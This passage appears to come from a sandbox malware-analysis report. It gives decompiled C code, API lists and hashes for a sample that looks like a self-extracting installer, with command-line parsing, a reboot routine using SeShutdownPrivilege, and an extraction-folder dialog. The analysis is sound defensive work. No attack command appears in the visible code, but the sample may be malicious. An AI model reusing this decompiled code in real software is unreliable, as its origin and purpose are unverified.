																if(E003931E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x398a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x398a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x398a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x398a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x398a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x399a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x399a2c =  *0x399a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x398d48 =  *0x398d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x399a2c =  *0x399a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x399a2c =  *0x399a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x398d48 =  *0x398d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x399a2c =  *0x399a2c | 0x00000004;
																										L70:
																										 *0x398a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
                                                                                                                                                                                                    																					}
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																				_t144 =  *_t220;
                                                                                                                                                                                                    																				_t201 = _t144;
                                                                                                                                                                                                    																			} while (_t144 != 0);
                                                                                                                                                                                                    																		}
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	 *0x399a2c = 3;
                                                                                                                                                                                                    																	 *0x398a28 = 1;
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    																goto L50;
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																if(_t132 == 0) {
                                                                                                                                                                                                    																	goto L98;
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	L49:
                                                                                                                                                                                                    																	_t209 = 0;
                                                                                                                                                                                                    																	L50:
                                                                                                                                                                                                    																	_t173 = _v272;
                                                                                                                                                                                                    																	if( *_t173 != 0) {
                                                                                                                                                                                                    																		goto L2;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		break;
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											goto L106;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										L34:
                                                                                                                                                                                                    										_t209 = 0;
                                                                                                                                                                                                    										break;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L131;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if( *0x398a2c != 0 &&  *0x398b3e == 0) {
                                                                                                                                                                                                    						if(GetModuleFileNameA( *0x399a3c, 0x398b3e, 0x104) == 0) {
                                                                                                                                                                                                    							_t209 = 0;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t202 = 0x5c;
                                                                                                                                                                                                    							 *((char*)(E003966C8(0x398b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t63 = _t209;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				L131:
                                                                                                                                                                                                    			}
                                                                                                                                                                                                    0x00395c9e
                                                                                                                                                                                                    0x00395ca9
                                                                                                                                                                                                    0x00395cb0
                                                                                                                                                                                                    0x00395cb3
                                                                                                                                                                                                    0x00395cb6
                                                                                                                                                                                                    0x00395cb7
                                                                                                                                                                                                    0x00395cb8
                                                                                                                                                                                                    0x00395cbd
                                                                                                                                                                                                    0x00396204
                                                                                                                                                                                                    0x00395ccb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395ccb
                                                                                                                                                                                                    0x00395cd3
                                                                                                                                                                                                    0x00395cd7
                                                                                                                                                                                                    0x00395cf4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395cf4
                                                                                                                                                                                                    0x00395cf8
                                                                                                                                                                                                    0x00395d00
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395d06
                                                                                                                                                                                                    0x00395d06
                                                                                                                                                                                                    0x00395d0e
                                                                                                                                                                                                    0x00395d10
                                                                                                                                                                                                    0x00395d12
                                                                                                                                                                                                    0x00395d14
                                                                                                                                                                                                    0x00395d15
                                                                                                                                                                                                    0x00395d17
                                                                                                                                                                                                    0x00395d49
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395d19
                                                                                                                                                                                                    0x00395d19
                                                                                                                                                                                                    0x00395d1d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395d3f
                                                                                                                                                                                                    0x00395d3f
                                                                                                                                                                                                    0x00395d4b
                                                                                                                                                                                                    0x00395d4b
                                                                                                                                                                                                    0x00395d4f
                                                                                                                                                                                                    0x00395d8d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395d93
                                                                                                                                                                                                    0x00395d93
                                                                                                                                                                                                    0x00395d9a
                                                                                                                                                                                                    0x00395d9d
                                                                                                                                                                                                    0x00395d9e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395d9e
                                                                                                                                                                                                    0x00395d51
                                                                                                                                                                                                    0x00395d5b
                                                                                                                                                                                                    0x00395d72
                                                                                                                                                                                                    0x003960fb
                                                                                                                                                                                                    0x003960fb
                                                                                                                                                                                                    0x00396207
                                                                                                                                                                                                    0x0039620a
                                                                                                                                                                                                    0x0039620b
                                                                                                                                                                                                    0x0039620e
                                                                                                                                                                                                    0x00396217
                                                                                                                                                                                                    0x00395d78
                                                                                                                                                                                                    0x00395d78
                                                                                                                                                                                                    0x00395d80
                                                                                                                                                                                                    0x00395d83
                                                                                                                                                                                                    0x00395d84
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395d84
                                                                                                                                                                                                    0x00395d5d
                                                                                                                                                                                                    0x00395d5f
                                                                                                                                                                                                    0x00395d62
                                                                                                                                                                                                    0x00395d68
                                                                                                                                                                                                    0x00395d64
                                                                                                                                                                                                    0x00395d64
                                                                                                                                                                                                    0x00395d64
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395ff7
                                                                                                                                                                                                    0x00395fd5
                                                                                                                                                                                                    0x00395fd8
                                                                                                                                                                                                    0x00395fd8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395e6b
                                                                                                                                                                                                    0x00395e6b
                                                                                                                                                                                                    0x00395e6e
                                                                                                                                                                                                    0x00395f8b
                                                                                                                                                                                                    0x00395f99
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395f9f
                                                                                                                                                                                                    0x00395fa7
                                                                                                                                                                                                    0x00395faf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395fb1
                                                                                                                                                                                                    0x00395fb3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395fb5
                                                                                                                                                                                                    0x00395fb7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395fb9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395fb9
                                                                                                                                                                                                    0x00395fb7
                                                                                                                                                                                                    0x00395fb3
                                                                                                                                                                                                    0x00395faf
                                                                                                                                                                                                    0x00395f8d
                                                                                                                                                                                                    0x00395f8d
                                                                                                                                                                                                    0x00395f8d
                                                                                                                                                                                                    0x00395f8f
                                                                                                                                                                                                    0x00395fc1
                                                                                                                                                                                                    0x00395fc1
                                                                                                                                                                                                    0x00395fc1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395e74
                                                                                                                                                                                                    0x00395e74
                                                                                                                                                                                                    0x00395e77
                                                                                                                                                                                                    0x00395ea0
                                                                                                                                                                                                    0x00395ebd
                                                                                                                                                                                                    0x00395f79
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395f7f
                                                                                                                                                                                                    0x00395ec3
                                                                                                                                                                                                    0x00395ec3
                                                                                                                                                                                                    0x00395ecc
                                                                                                                                                                                                    0x00395ed4
                                                                                                                                                                                                    0x00395ed6
                                                                                                                                                                                                    0x00395edc
                                                                                                                                                                                                    0x00395edf
                                                                                                                                                                                                    0x00395eea
                                                                                                                                                                                                    0x00395eed
                                                                                                                                                                                                    0x00395f3f
                                                                                                                                                                                                    0x00395f40
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395eef
                                                                                                                                                                                                    0x00395eef
                                                                                                                                                                                                    0x00395ef2
                                                                                                                                                                                                    0x00395f34
                                                                                                                                                                                                    0x00395ef4
                                                                                                                                                                                                    0x00395ef4
                                                                                                                                                                                                    0x00395ef7
                                                                                                                                                                                                    0x00395f2b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395ef9
                                                                                                                                                                                                    0x00395ef9
                                                                                                                                                                                                    0x00395efc
                                                                                                                                                                                                    0x00395f22
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395efe
                                                                                                                                                                                                    0x00395eff
                                                                                                                                                                                                    0x00395f02
                                                                                                                                                                                                    0x00395f16
                                                                                                                                                                                                    0x00395f04
                                                                                                                                                                                                    0x00395f07
                                                                                                                                                                                                    0x00395f0d
                                                                                                                                                                                                    0x00395f46
                                                                                                                                                                                                    0x00395f46
                                                                                                                                                                                                    0x00395f09
                                                                                                                                                                                                    0x00395f09
                                                                                                                                                                                                    0x00395f09
                                                                                                                                                                                                    0x00395f07
                                                                                                                                                                                                    0x00395f02
                                                                                                                                                                                                    0x00395efc
                                                                                                                                                                                                    0x00395ef7
                                                                                                                                                                                                    0x00395ef2
                                                                                                                                                                                                    0x00395f4c
                                                                                                                                                                                                    0x00395f4e
                                                                                                                                                                                                    0x00395f50
                                                                                                                                                                                                    0x00395f54
                                                                                                                                                                                                    0x00395ed4
                                                                                                                                                                                                    0x00395ea2
                                                                                                                                                                                                    0x00395ea4
                                                                                                                                                                                                    0x00395eaf
                                                                                                                                                                                                    0x00395eaf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395e79
                                                                                                                                                                                                    0x00395e7d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395e83
                                                                                                                                                                                                    0x00395e83
                                                                                                                                                                                                    0x00395e83
                                                                                                                                                                                                    0x00395e85
                                                                                                                                                                                                    0x00395e85
                                                                                                                                                                                                    0x00395e8e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395e94
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395e94
                                                                                                                                                                                                    0x00395e8e
                                                                                                                                                                                                    0x00395e7d
                                                                                                                                                                                                    0x00395e77
                                                                                                                                                                                                    0x00395e6e
                                                                                                                                                                                                    0x00395e65
                                                                                                                                                                                                    0x00395e5c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395dd0
                                                                                                                                                                                                    0x00395dd0
                                                                                                                                                                                                    0x00395dd0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395dd0
                                                                                                                                                                                                    0x00395dce
                                                                                                                                                                                                    0x00395dca
                                                                                                                                                                                                    0x00395dba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395d00
                                                                                                                                                                                                    0x00395dd9
                                                                                                                                                                                                    0x00395e04
                                                                                                                                                                                                    0x003961fe
                                                                                                                                                                                                    0x00395e0a
                                                                                                                                                                                                    0x00395e0c
                                                                                                                                                                                                    0x00395e17
                                                                                                                                                                                                    0x00395e17
                                                                                                                                                                                                    0x00395e04
                                                                                                                                                                                                    0x00396200
                                                                                                                                                                                                    0x00396200
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CharNextA.USER32(?,00000000,?,?), ref: 00395CEE
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00398B3E,00000104,00000000,?,?), ref: 00395DFC
                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 00395E3E
                                                                                                                                                                                                    • CharUpperA.USER32(-00000052), ref: 00395EE1
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00395F6F
                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 00395FA7
                                                                                                                                                                                                    • CharUpperA.USER32(-0000004E), ref: 00396008
                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 003960AA
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00391140,00000000,00000040,00000000), ref: 003961F1
                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 003961F8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                    • String ID: "$"$:$RegServer
                                                                                                                                                                                                    • API String ID: 1203814774-25366791
                                                                                                                                                                                                    • Opcode ID: 54bd1d80671d6666de93fff88415052b2ce14f29f84dbecb62ff6b50cdde351a
                                                                                                                                                                                                    • Instruction ID: 4be7a354b1cbf682e09299ad20bfb8a8fa70a3e4791bcaca366f951e637d5ee9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54bd1d80671d6666de93fff88415052b2ce14f29f84dbecb62ff6b50cdde351a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68D16871E08E459FDF378B388C497FA3BA9AB56340F1501ABC4C6D6591DA728EC68F40
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 60%
                                                                                                                                                                                                    			E00391F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                    				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				signed int _t13;
                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                    				int _t28;
                                                                                                                                                                                                    				signed char _t30;
                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t41 = __esi;
                                                                                                                                                                                                    				_t38 = __edi;
                                                                                                                                                                                                    				_t30 = __ecx;
                                                                                                                                                                                                    				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                    						if( *0x399a40 != 0) {
                                                                                                                                                                                                    							_pop(_t30);
                                                                                                                                                                                                    							_t44 = _t46;
                                                                                                                                                                                                    							_t13 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                    							_push(_t38);
                                                                                                                                                                                                    							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                    								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                    								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                    								_v12 = 2;
                                                                                                                                                                                                    								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                    								CloseHandle(_v28);
                                                                                                                                                                                                    								_t41 = _t41;
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								if(_t21 != 0) {
                                                                                                                                                                                                    									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                    										_t25 = 1;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t37 = 0x4f7;
                                                                                                                                                                                                    										goto L3;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t37 = 0x4f6;
                                                                                                                                                                                                    									goto L4;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t37 = 0x4f5;
                                                                                                                                                                                                    								L3:
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								L4:
                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								E003944B9(0, _t37);
                                                                                                                                                                                                    								_t25 = 0;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_pop(_t40);
                                                                                                                                                                                                    							return E00396CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t37 = 0x522;
                                                                                                                                                                                                    						_t28 = E003944B9(0, 0x522, 0x391140, 0, 0x40, 4);
                                                                                                                                                                                                    						if(_t28 != 6) {
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					__eax = E00391EA7(__ecx);
                                                                                                                                                                                                    					if(__eax != 2) {
                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                    						return _t28;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}

Instruction addresses for E00391F90 (layout column, flattened): 0x00391f90, 0x00391f90, 0x00391f93, 0x00391f98, 0x00391fa4, 0x00391fa7, 0x00391fc5, 0x00391fcd, 0x00391fdb, 0x00391ee5, 0x00391eea, 0x00391ef1, 0x00391ef4, 0x00391f0c, 0x00391f2e, 0x00391f3a, 0x00391f46, 0x00391f4d, 0x00391f58, 0x00391f60, 0x00391f61, 0x00391f62, 0x00391f75, 0x00391f80, 0x00391f77, 0x00391f77, 0x00000000, 0x00391f77, 0x00391f64, 0x00391f64, 0x00000000, 0x00391f64, 0x00391f0e, 0x00391f0e, 0x00391f13, 0x00391f13, 0x00391f14, 0x00391f14, 0x00391f16, 0x00391f17, 0x00391f1a, 0x00391f1f, 0x00391f1f, 0x00391f86
                                                                                                                                                                                                    0x00391f8f
                                                                                                                                                                                                    0x00391fcf
                                                                                                                                                                                                    0x00391fd3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00391fd3
                                                                                                                                                                                                    0x00391fa9
                                                                                                                                                                                                    0x00391fb4
                                                                                                                                                                                                    0x00391fbb
                                                                                                                                                                                                    0x00391fc3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00391fc3
                                                                                                                                                                                                    0x00391f9a
                                                                                                                                                                                                    0x00391f9a
                                                                                                                                                                                                    0x00391fa2
                                                                                                                                                                                                    0x00391fd9
                                                                                                                                                                                                    0x00391fda
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00391fa2

APIs
• GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00391EFB
• OpenProcessToken.ADVAPI32(00000000), ref: 00391F02
• ExitWindowsEx.USER32(00000002,00000000), ref: 00391FD3
Strings
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: Process$CurrentExitOpenTokenWindows
• String ID: SeShutdownPrivilege
• API String ID: 2795981589-3733053543
• Opcode ID: 0649b190c3357fbb600057220a322c3568ee933620aa04886ec0cba3002a227f
• Instruction ID: b622eb06ed64d21cb7168dc2a26577b540c02ddc8e32b019614c588e487260bd
• Opcode Fuzzy Hash: 0649b190c3357fbb600057220a322c3568ee933620aa04886ec0cba3002a227f
• Instruction Fuzzy Hash: 9321C771B4020A7BDF235BA59C4AFBF77BCEB85B50F11021AFA03F6181D775880196A5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00396CF0(char _a4) {

				SetUnhandledExceptionFilter(0);
				_t1 =  &_a4; // 0x396e26
				UnhandledExceptionFilter( *_t1);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}




APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,00396E26,00391000), ref: 00396CF7
• UnhandledExceptionFilter.KERNEL32(&n9,?,00396E26,00391000), ref: 00396D00
• GetCurrentProcess.KERNEL32(C0000409,?,00396E26,00391000), ref: 00396D0B
• TerminateProcess.KERNEL32(00000000,?,00396E26,00391000), ref: 00396D12
Strings
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
• String ID: &n9
• API String ID: 3231755760-1744448865
• Opcode ID: 314b99d809860720527ce042c4479112880fca2b9a7f0ce5e9e76239e916e2b5
• Instruction ID: 192dd37470b0ad9a7c42f6e7d706dba5cd1ac8382f7d2e3899a19120ce56e6c0
• Opcode Fuzzy Hash: 314b99d809860720527ce042c4479112880fca2b9a7f0ce5e9e76239e916e2b5
• Instruction Fuzzy Hash: 66D0C932004908BBDB022BE5EC0CA593F2CEB88313F444102F31A82030CA3348518B92
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 76%
			E00393210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E003943D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "nst0dum");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x399a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x3991e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							L25:
                                                                                                                                                                                                    							E003944B9(_t64, _t58);
                                                                                                                                                                                                    							goto L39;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t49 = 0x3991e4;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t23 =  *_t49;
                                                                                                                                                                                                    							_t49 =  &(_t49[1]);
                                                                                                                                                                                                    							__eflags = _t23;
                                                                                                                                                                                                    						} while (_t23 != 0);
                                                                                                                                                                                                    						__eflags = _t49 - 0x3991e5 - 3;
                                                                                                                                                                                                    						if(_t49 - 0x3991e5 < 3) {
                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t24 =  *0x3991e5; // 0x3a
                                                                                                                                                                                                    						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                    						if(_t24 == 0x3a) {
                                                                                                                                                                                                    							L21:
                                                                                                                                                                                                    							_t25 = GetFileAttributesA(0x3991e4);
                                                                                                                                                                                                    							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                    							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                    								L26:
                                                                                                                                                                                                    								E0039658A(0x3991e4, 0x104, 0x391140);
                                                                                                                                                                                                    								_t27 = E003958C8(0x3991e4);
                                                                                                                                                                                                    								__eflags = _t27;
                                                                                                                                                                                                    								if(_t27 != 0) {
                                                                                                                                                                                                    									__eflags =  *0x3991e4 - 0x5c;
                                                                                                                                                                                                    									if( *0x3991e4 != 0x5c) {
                                                                                                                                                                                                    										L30:
                                                                                                                                                                                                    										_t30 = E0039597D(0x3991e4, 1, _t64, 1);
                                                                                                                                                                                                    										__eflags = _t30;
                                                                                                                                                                                                    										if(_t30 == 0) {
                                                                                                                                                                                                    											L35:
                                                                                                                                                                                                    											_t42 = 1;
                                                                                                                                                                                                    											__eflags = 1;
                                                                                                                                                                                                    											goto L36;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										L31:
                                                                                                                                                                                                    										_t42 = 1;
                                                                                                                                                                                                    										EndDialog(_t64, 1);
                                                                                                                                                                                                    										goto L36;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags =  *0x3991e5 - 0x5c;
                                                                                                                                                                                                    									if( *0x3991e5 == 0x5c) {
                                                                                                                                                                                                    										goto L31;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L30;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_t58 = 0x4be;
                                                                                                                                                                                                    								goto L25;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t32 = E003944B9(_t64, 0x54a, 0x3991e4, 0, 0x20, 4);
                                                                                                                                                                                                    							__eflags = _t32 - 6;
                                                                                                                                                                                                    							if(_t32 != 6) {
